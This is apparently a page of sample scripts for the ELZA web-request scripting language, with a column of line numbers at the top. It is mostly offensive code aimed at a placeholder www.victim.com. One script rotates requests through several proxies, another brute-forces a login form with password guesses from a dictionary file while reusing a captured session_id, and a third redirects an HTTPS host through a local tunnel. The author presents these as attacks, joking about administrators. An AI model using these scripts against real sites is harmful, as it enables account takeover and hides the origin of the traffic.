1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
|
Those are some samples of code that one may find useful:
1. PROXY ROTATION
# First, push values into PROXY and PORT. Each time we use one of
# those substs, the next available value is substituted.
subst PROXY @ proxy.domain1.com proxy.domain2.com proxy.domain3.com
subst PORT @ 3128 8080 80
# the BEFOREREQUEST proc is automatically executed before making
# a request to remote server. This allows us to set a proxy server.
proc BEFOREREQUEST
# Push the next avaiable values from PROXY and PORT into
# the respective system variable
var proxy = PROXY
var port = PORT
endproc BEFOREREQUEST
# And now we do the requests we want to do. Each of them is piped
# through a different proxy server.
get url http://www.victim.com/page1.html
get url http://www.victim.com/page2.html
get url http://www.victim.com/page3.html
get url http://www.victim.com/page4.html
get url http://www.victim.com/page5.html
In this example, page1.html is requested through proxy.domain1.com on port
3128, page2.html is requested through proxy.domain2.com:8080, and page3.html
- through proxy.domain3.com:80. page4.html is requested again through the
first proxy, page5.html - through the second and so on. Cool, isn't it?
2. DICTIONARY ATTACK
This script is to serve as an example on how one can write a dictionary
attacks work using the ELZA. I guess many web site administrators are not
THAT stupid after all. If they lock out an account after several wrong
passwords, you can do nothing.
# First, we define the static things
subst ACCOUNT = bozo
# We request the actual login form so that we can examine it
get url http://www.victim.com/loginform.html
# Then, we grab the very important session_id hidden form field,
# so that we pass it along with each of our login attempts.
field session_id $
# Then, we save the form field value we just grabbed into a subst
# so that we can use it in the future.
subst SID f= session_id
# Next, we define a procedure to be executed if our attack is
# successful.
proc SUCCESS
print WOW! Login: ACCOUNT, Password: CURRPASS
endproc SUCCESS
# Then, we define the procedure that tries to break in
proc TRYPASSWORD
# All necessary fields should be set before the request,
# because they are cleared after each request.
field username = ACCOUNT
field password = CURRPASS
# We set the session_id form field value we hijacked from the
# legitimate login form.
field session_id = SID
# And we do a POST to the login script
post url http://www.victim.com/cgi-bin/login.cgi
# Next, we check if we were successful and if we are,
# we call the SUCCESS procedure.
call SUCCESS if body != Login failed!
endproc TRYPASSWORD
# And finally, we define the main loop that is to execute the
# TRYPASSWORD for each password from our dictionary file (dict.txt)
call TRYPASSWORD CURRPASS % dict.txt
3. AVOIDING SPAWINING THE SSL TUNNEL REPEATEDLY
This should work as follows:
1. Spawn the tunnel before running the ELZA Script.
2. In the elza script, do a hostmap for the host you want to
connect to:
# Tell ELZA not to spawn tunnel when encountering https://
var honorhttps = no
# Tell ELZA to pipe all request to secure-server.victim.com
# on port 443 to localhost, port 24242
hostmap secure-server.victim.com 443 localhost 24242
That is all for now. If you have a piece of code you would like to be
included, please pass it on to philip_stoev@iname.com.
|
